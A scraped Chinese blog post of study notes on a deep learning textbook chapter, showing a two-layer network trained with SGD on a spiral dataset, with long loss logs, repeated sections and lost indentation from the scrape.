| loss 0.13| epoch 244 |  iter 10 / 10 | loss 0.13| epoch 245 |  iter 10 / 10 | loss 0.13| epoch 246 |  iter 10 / 10 | loss 0.13| epoch 247 |  iter 10 / 10 | loss 0.13| epoch 248 |  iter 10 / 10 | loss 0.13| epoch 249 |  iter 10 / 10 | loss 0.13| epoch 250 |  iter 10 / 10 | loss 0.13| epoch 251 |  iter 10 / 10 | loss 0.13| epoch 252 |  iter 10 / 10 | loss 0.12| epoch 253 |  iter 10 / 10 | loss 0.12| epoch 254 |  iter 10 / 10 | loss 0.12| epoch 255 |  iter 10 / 10 | loss 0.12| epoch 256 |  iter 10 / 10 | loss 0.12| epoch 257 |  iter 10 / 10 | loss 0.12| epoch 258 |  iter 10 / 10 | loss 0.12| epoch 259 |  iter 10 / 10 | loss 0.13| epoch 260 |  iter 10 / 10 | loss 0.12| epoch 261 |  iter 10 / 10 | loss 0.13| epoch 262 |  iter 10 / 10 | loss 0.12| epoch 263 |  iter 10 / 10 | loss 0.12| epoch 264 |  iter 10 / 10 | loss 0.13| epoch 265 |  iter 10 / 10 | loss 0.12| epoch 266 |  iter 10 / 10 | loss 0.12| epoch 267 |  iter 10 / 10 | loss 0.12| epoch 268 |  iter 10 / 10 | loss 0.12| epoch 269 |  iter 10 / 10 | loss 0.11| epoch 270 |  iter 10 / 10 | loss 0.12| epoch 271 |  iter 10 / 10 | loss 0.12| epoch 272 |  iter 10 / 10 | loss 0.12| epoch 273 |  iter 10 / 10 | loss 0.12| epoch 274 |  iter 10 / 10 | loss 0.12| epoch 275 |  iter 10 / 10 | loss 0.11| epoch 276 |  iter 10 / 10 | loss 0.12| epoch 277 |  iter 10 / 10 | loss 0.12| epoch 278 |  iter 10 / 10 | loss 0.11| epoch 279 |  iter 10 / 10 | loss 0.11| epoch 280 |  iter 10 / 10 | loss 0.11| epoch 281 |  iter 10 / 10 | loss 0.11| epoch 282 |  iter 10 / 10 | loss 0.12| epoch 283 |  iter 10 / 10 | loss 0.11| epoch 284 |  iter 10 / 10 | loss 0.11| epoch 285 |  iter 10 / 10 | loss 0.11| epoch 286 |  iter 10 / 10 | loss 0.11| epoch 287 |  iter 10 / 10 | loss 0.11| epoch 288 |  iter 10 / 10 | loss 0.12| epoch 289 |  iter 10 / 10 | loss 0.11| epoch 290 |  iter 10 / 10 | loss 0.11| epoch 291 |  iter 10 / 10 | loss 0.11| epoch 292 |  iter 10 / 10 | loss 0.11| epoch 293 |  iter 10 / 10 | loss 0.11| epoch 294 |  iter 10 / 10 | loss 0.11| epoch 295 |  iter 10 / 10 | loss 0.12| epoch 296 |  iter 10 / 10 | loss 0.11| epoch 297 |  iter 10 / 10 | loss 0.12| epoch 298 |  iter 10 / 10 | loss 0.11| epoch 299 |  iter 10 / 10 | loss 0.11| epoch 300 |  iter 10 / 10 | loss 0.11
    # 绘制学习结果
    plt.plot(np.arange(len(loss_list)), loss_list, label='train')
    plt.xlabel('iterations (x10)')
    plt.ylabel('loss')
    plt.show()


    png

    # 绘制决策边界
    h = 0.001
    x_min, x_max = x[:, 0].min() - .1, x[:, 0].max() + .1
    y_min, y_max = x[:, 1].min() - .1, x[:, 1].max() + .1
    xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
    X = np.c_[xx.ravel(), yy.ravel()]
    score = model.predict(X)
    predict_cls = np.argmax(score, axis=1)
    Z = predict_cls.reshape(xx.shape)
    plt.contourf(xx, yy, Z)
    plt.axis('off')

    # 绘制数据点
    x, t = spiral.load_data()
    N = 100
    CLS_NUM = 3
    markers = ['o', 'x', '^']
    for i in range(CLS_NUM):
    plt.scatter(x[i*N:(i+1)*N, 0], x[i*N:(i+1)*N, 1], s=40, marker=markers[i])
    plt.show()

    png

    1.4.4 Trainer 类

    将执行神经网络的学习封装成一个类。

    import sys
    sys.path.append('..')
    from common.optimizer import SGD
    from common.trainer import Trainer
    from dataset import spiral

    max_epoch = 300
    batch_size = 30
    hidden_size = 10
    learning_rate = 1.0
    x, t = spiral.load_data()
    model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
    optimizer = SGD(lr=learning_rate)
    trainer = Trainer(model, optimizer)
    """
    x: 输入数据
    t: 监督标签
    max_epoch (= 10): 进行学习的 epoch 数
    batch_size(= 32): mini-batch 的大小
    eval_interval(= 20): 输出结果(平均损失等)的间隔。
    例如设置 eval_interval=20,则每 20 次迭代计算 1 次平均损失,并将结果输出到界面上。
    max_grad(= None): 梯度的最大范数。
    """
    trainer.fit(x, t, max_epoch, batch_size, eval_interval=10)
    trainer.plot()
    | epoch 1 |  iter 1 / 10 | time 0[s] | loss 1.10| epoch 2 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 3 |  iter 1 / 10 | time 0[s] | loss 1.13| epoch 4 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 5 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 6 |  iter 1 / 10 | time 0[s] | loss 1.10| epoch 7 |  iter 1 / 10 | time 0[s] | loss 1.14| epoch 8 |  iter 1 / 10 | time 0[s] | loss 1.16| epoch 9 |  iter 1 / 10 | time 0[s] | loss 1.11| epoch 10 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 11 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 12 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 13 |  iter 1 / 10 | time 0[s] | loss 1.10| epoch 14 |  iter 1 / 10 | time 0[s] | loss 1.09| epoch 15 |  iter 1 / 10 | time 0[s] | loss 1.08| epoch 16 |  iter 1 / 10 | time 0[s] | loss 1.04| epoch 17 |  iter 1 / 10 | time 0[s] | loss 1.03| epoch 18 |  iter 1 / 10 | time 0[s] | loss 0.94| epoch 19 |  iter 1 / 10 | time 0[s] | loss 0.92| epoch 20 |  iter 1 / 10 | time 0[s] | loss 0.92| epoch 21 |  iter 1 / 10 | time 0[s] | loss 0.87| epoch 22 |  iter 1 / 10 | time 0[s] | loss 0.85| epoch 23 |  iter 1 / 10 | time 0[s] | loss 0.80| epoch 24 |  iter 1 / 10 | time 0[s] | loss 0.79| epoch 25 |  iter 1 / 10 | time 0[s] | loss 0.78| epoch 26 |  iter 1 / 10 | time 0[s] | loss 0.83| epoch 27 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 28 |  iter 1 / 10 | time 0[s] | loss 0.76| epoch 29 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 30 |  iter 1 / 10 | time 0[s] | loss 0.76| epoch 31 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 32 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 33 |  iter 1 / 10 | time 0[s] | loss 0.78| epoch 34 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 35 |  iter 1 / 10 | time 0[s] | loss 0.78| epoch 36 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 37 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 38 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 39 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 40 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 41 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 42 |  iter 1 / 10 | time 0[s] | loss 0.76| epoch 43 |  iter 1 / 10 | time 0[s] | loss 0.79| epoch 44 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 45 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 46 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 47 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 48 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 49 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 50 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 51 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 52 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 53 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 54 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 55 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 56 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 57 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 58 |  iter 1 / 10 | time 0[s] | loss 0.69| epoch 59 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 60 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 61 |  iter 1 / 10 | time 0[s] | loss 0.69| epoch 62 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 63 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 64 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 65 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 66 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 67 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 68 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 69 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 70 |  iter 1 / 10 | time 0[s] | loss 0.68| epoch 71 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 72 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 73 |  iter 1 / 10 | time 0[s] | loss 0.69| epoch 74 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 75 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 76 |  iter 1 / 10 | time 0[s] | loss 0.65| epoch 77 |  iter 1 / 10 | time 0[s] | loss 0.67| epoch 78 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 79 |  iter 1 / 10 | time 0[s] | loss 0.63| epoch 80 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 81 |  iter 1 / 10 | time 0[s] | loss 0.65| epoch 82 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 83 |  iter 1 / 10 | time 0[s] | loss 0.64| epoch 84 |  iter 1 / 10 | time 0[s] | loss 0.62| epoch 85 |  iter 1 / 10 | time 0[s] | loss 0.62| epoch 86 |  iter 1 / 10 | time 0[s] | loss 0.63| epoch 87 |  iter 1 / 10 | time 0[s] | loss 0.59| epoch 88 |  iter 1 / 10 | time 0[s] | loss 0.58| epoch 89 |  iter 1 / 10 | time 0[s] | loss 0.61| epoch 90 |  iter 1 / 10 | time 0[s] | loss 0.59| epoch 91 |  iter 1 / 10 | time 0[s] | loss 0.58| epoch 92 |  iter 1 / 10 | time 0[s] | loss 0.57| epoch 93 |  iter 1 / 10 | time 0[s] | loss 0.55| epoch 94 |  iter 1 / 10 | time 0[s] | loss 0.54| epoch 95 |  iter 1 / 10 | time 0[s] | loss 0.53| epoch 96 |  iter 1 / 10 | time 0[s] | loss 0.54| epoch 97 |  iter 1 / 10 | time 0[s] | loss 0.51| epoch 98 |  iter 1 / 10 | time 0[s] | loss 0.51| epoch 99 |  iter 1 / 10 | time 0[s] | loss 0.50| epoch 100 |  iter 1 / 10 | time 0[s] | loss 0.47| epoch 101 |  iter 1 / 10 | time 0[s] | loss 0.49| epoch 102 |  iter 1 / 10 | time 0[s] | loss 0.46| epoch 103 |  iter 1 / 10 | time 0[s] | loss 0.44| epoch 104 |  iter 1 / 10 | time 0[s] | loss 0.47| epoch 105 |  iter 1 / 10 | time 0[s] | loss 0.44| epoch 106 |  iter 1 / 10 | time 0[s] | loss 0.43| epoch 107 |  iter 1 / 10 | time 0[s] | loss 0.43| epoch 108 |  iter 1 / 10 | time 0[s] | loss 0.39| epoch 109 |  iter 1 / 10 | time 0[s] | loss 0.40| epoch 110 |  iter 1 / 10 | time 0[s] | loss 0.41| epoch 111 |  iter 1 / 10 | time 0[s] | loss 0.38| epoch 112 |  iter 1 / 10 | time 0[s] | loss 0.38| epoch 113 |  iter 1 / 10 | time 0[s] | loss 0.38| epoch 114 |  iter 1 / 10 | time 0[s] | loss 0.37| epoch 115 |  iter 1 / 10 | time 0[s] | loss 0.36| epoch 116 |  iter 1 / 10 | time 0[s] | loss 0.34| epoch 117 |  iter 1 / 10 | time 0[s] | loss 0.35| epoch 118 |  iter 1 / 10 | time 0[s] | loss 0.33| epoch 119 |  iter 1 / 10 | time 0[s] | loss 0.35| epoch 120 |  iter 1 / 10 | time 0[s] | loss 0.33| epoch 121 |  iter 1 / 10 | time 0[s] | loss 0.33| epoch 122 |  iter 1 / 10 | time 0[s] | loss 0.32| epoch 123 |  iter 1 / 10 | time 0[s] | loss 0.31| epoch 124 |  iter 1 / 10 | time 0[s] | loss 0.31| epoch 125 |  iter 1 / 10 | time 0[s] | loss 0.31| epoch 126 |  iter 1 / 10 | time 0[s] | loss 0.30| epoch 127 |  iter 1 / 10 | time 0[s] | loss 0.30| epoch 128 |  iter 1 / 10 | time 0[s] | loss 0.27| epoch 129 |  iter 1 / 10 | time 0[s] | loss 0.30| epoch 130 |  iter 1 / 10 | time 0[s] | loss 0.28| epoch 131 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 132 |  iter 1 / 10 | time 0[s] | loss 0.27| epoch 133 |  iter 1 / 10 | time 0[s] | loss 0.27| epoch 134 |  iter 1 / 10 | time 0[s] | loss 0.28| epoch 135 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 136 |  iter 1 / 10 | time 0[s] | loss 0.28| epoch 137 |  iter 1 / 10 | time 0[s] | loss 0.25| epoch 138 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 139 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 140 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 141 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 142 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 143 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 144 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 145 |  iter 1 / 10 | time 0[s] | loss 0.24| epoch 146 |  iter 1 / 10 | time 0[s] | loss 0.24| epoch 147 |  iter 1 / 10 | time 0[s] | loss 0.25| epoch 148 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 149 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 150 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 151 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 152 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 153 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 154 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 155 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 156 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 157 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 158 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 159 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 160 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 161 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 162 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 163 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 164 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 165 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 166 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 167 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 168 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 169 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 170 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 171 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 172 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 173 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 174 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 175 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 176 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 177 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 178 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 179 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 180 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 181 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 182 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 183 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 184 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 185 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 186 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 187 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 188 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 189 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 190 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 191 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 192 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 193 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 194 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 195 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 196 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 197 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 198 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 199 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 200 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 201 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 202 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 203 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 204 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 205 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 206 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 207 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 208 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 209 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 210 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 211 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 212 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 213 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 214 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 215 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 216 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 217 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 218 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 219 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 220 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 221 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 222 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 223 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 224 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 225 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 226 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 227 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 228 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 229 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 230 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 231 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 232 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 233 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 234 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 235 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 236 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 237 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 238 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 239 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 240 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 241 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 242 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 243 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 244 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 245 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 246 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 247 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 248 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 249 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 250 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 251 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 252 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 253 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 254 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 255 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 256 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 257 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 258 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 259 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 260 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 261 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 262 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 263 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 264 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 265 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 266 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 267 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 268 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 269 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 270 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 271 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 272 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 273 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 274 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 275 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 276 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 277 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 278 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 279 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 280 |  iter 1 / 10 | time 0[s] | loss 0.10| epoch 281 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 282 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 283 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 284 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 285 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 286 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 287 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 288 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 289 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 290 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 291 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 292 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 293 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 294 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 295 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 296 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 297 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 298 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 299 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 300 |  iter 1 / 10 | time 0[s] | loss 0.11

    png

    1.5 计算的高速化

    1.5.1 位精度

    随着深度学习备受瞩目,最近的 GPU 已经开始支持 16 位半精度浮点数的存储与计算。另外,谷歌公司设计了一款名为 TPU 的专用芯片,可以支持 8 位计算。

    1.5.2 GPU(CuPy)

    CuPy 是基于 GPU 进行并行计算的库。要使用 CuPy,需要使用安装有 NVIDIA 的 GPU 的机器,并且需要安装 CUDA 这个面向 GPU 的通用并行计算平台。

    1.6 小结

    • 神经网络具有输入层、隐藏层和输出层

    • 通过全连接层进行线性变换,通过激活函数进行非线性变换

    • 全连接层和 mini-batch 处理都可以写成矩阵计算

    • 使用误差反向传播法可以高效地求解神经网络的损失的梯度

    • 使用计算图能够将神经网络中发生的处理可视化,这有助于理解正向传播和反向传播

    • 在神经网络的实现中,通过将组件模块化为层,可以简化实现

    • 数据的位精度和 GPU 并行计算对神经网络的高速化非常重要

    ]]>
    + 正文

    1.4 使用神经网络解决问题

    1.4.1 螺旋状数据集

    1
    2
    3
    4
    5
    6
    7
    8
    import sys
    sys.path.append('..') # 为了引入父目录的文件而进行的设定
    from dataset import spiral
    import matplotlib.pyplot as plt

    x, t = spiral.load_data()
    print('x', x.shape) # (300, 2)
    print('t', t.shape) # (300, 3)
    x (300, 2)t (300, 3)
    1
    2
    3
    4
    5
    6
    7
    # 绘制数据点
    N = 100
    CLS_NUM = 3
    markers = ['o', 'x', '^']
    for i in range(CLS_NUM):
    plt.scatter(x[i * N:(i + 1) * N, 0], x[i * N: (i + 1) * N, 1], s=40, marker=markers[i])
    plt.show()

    png

    1.4.2 神经网络的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    import sys
    sys.path.append('..')
    import numpy as np
    from common.layers import Affine, Sigmoid, SoftmaxWithLoss


    class TwoLayerNet:
    def __init__(self, input_size, hidden_size, output_size):
    I, H, O = input_size, hidden_size, output_size
    # 初始化权重和偏置
    W1 = 0.01 * np.random.randn(I, H)
    b1 = np.zeros(H)
    W2 = 0.01 * np.random.randn(H, O)
    b2 = np.zeros(O)
    # 生成层
    self.layers = [Affine(W1, b1), Sigmoid(), Affine(W2, b2)]
    self.loss_layer = SoftmaxWithLoss()
    # 将所有的权重和梯度整理到列表中
    self.params, self.grads = [], []
    for layer in self.layers:
    self.params += layer.params
    self.grads += layer.grads


    def predict(self, x):
    for layer in self.layers:
    x = layer.forward(x)
    return x


    def forward(self, x, t):
    score = self.predict(x)
    loss = self.loss_layer.forward(score, t)
    return loss


    def backward(self, dout=1):
    dout = self.loss_layer.backward(dout)
    for layer in reversed(self.layers):
    dout = layer.backward(dout)
    return dout

    1.4.3 学习用的代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    import sys
    sys.path.append('..') # 为了引入父目录的文件而进行的设定
    import numpy as np
    from common.optimizer import SGD
    from dataset import spiral
    import matplotlib.pyplot as plt

    # 设定超参数
    max_epoch = 300
    batch_size = 30
    hidden_size = 10
    learning_rate = 1.0

    x, t = spiral.load_data()
    model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
    optimizer = SGD(lr=learning_rate)

    # 学习用的变量
    data_size = len(x)
    max_iters = data_size // batch_size
    total_loss = 0
    loss_count = 0
    loss_list = []

    for epoch in range(max_epoch):
    """
    在进行学习时,需要随机选择数据作为 mini-batch。
    """
    # 打乱数据 使用 np.random.permutation() 方法。给定参数 N,该方法可以返回 0 到 N − 1 的随机序列。
    idx = np.random.permutation(data_size)
    x = x[idx]
    t = t[idx]

    for iters in range(max_iters):
    batch_x = x[iters*batch_size:(iters+1)*batch_size]
    batch_t = t[iters*batch_size:(iters+1)*batch_size]

    # 计算梯度,更新参数
    loss = model.forward(batch_x, batch_t)
    model.backward()
    optimizer.update(model.params, model.grads)

    total_loss += loss
    loss_count += 1

    # 定期输出学习过程
    if (iters+1) % 10 == 0:
    avg_loss = total_loss / loss_count
    print('| epoch %d | iter %d / %d | loss %.2f'
    % (epoch + 1, iters + 1, max_iters, avg_loss))
    loss_list.append(avg_loss)
    total_loss, loss_count = 0, 0
    | epoch 1 |  iter 10 / 10 | loss 1.13| epoch 2 |  iter 10 / 10 | loss 1.13| epoch 3 |  iter 10 / 10 | loss 1.12| epoch 4 |  iter 10 / 10 | loss 1.12| epoch 5 |  iter 10 / 10 | loss 1.11| epoch 6 |  iter 10 / 10 | loss 1.14| epoch 7 |  iter 10 / 10 | loss 1.16| epoch 8 |  iter 10 / 10 | loss 1.11| epoch 9 |  iter 10 / 10 | loss 1.12| epoch 10 |  iter 10 / 10 | loss 1.13| epoch 11 |  iter 10 / 10 | loss 1.12| epoch 12 |  iter 10 / 10 | loss 1.11| epoch 13 |  iter 10 / 10 | loss 1.09| epoch 14 |  iter 10 / 10 | loss 1.08| epoch 15 |  iter 10 / 10 | loss 1.04| epoch 16 |  iter 10 / 10 | loss 1.03| epoch 17 |  iter 10 / 10 | loss 0.96| epoch 18 |  iter 10 / 10 | loss 0.92| epoch 19 |  iter 10 / 10 | loss 0.92| epoch 20 |  iter 10 / 10 | loss 0.87| epoch 21 |  iter 10 / 10 | loss 0.85| epoch 22 |  iter 10 / 10 | loss 0.82| epoch 23 |  iter 10 / 10 | loss 0.79| epoch 24 |  iter 10 / 10 | loss 0.78| epoch 25 |  iter 10 / 10 | loss 0.82| epoch 26 |  iter 10 / 10 | loss 0.78| epoch 27 |  iter 10 / 10 | loss 0.76| epoch 28 |  iter 10 / 10 | loss 0.76| epoch 29 |  iter 10 / 10 | loss 0.78| epoch 30 |  iter 10 / 10 | loss 0.75| epoch 31 |  iter 10 / 10 | loss 0.78| epoch 32 |  iter 10 / 10 | loss 0.77| epoch 33 |  iter 10 / 10 | loss 0.77| epoch 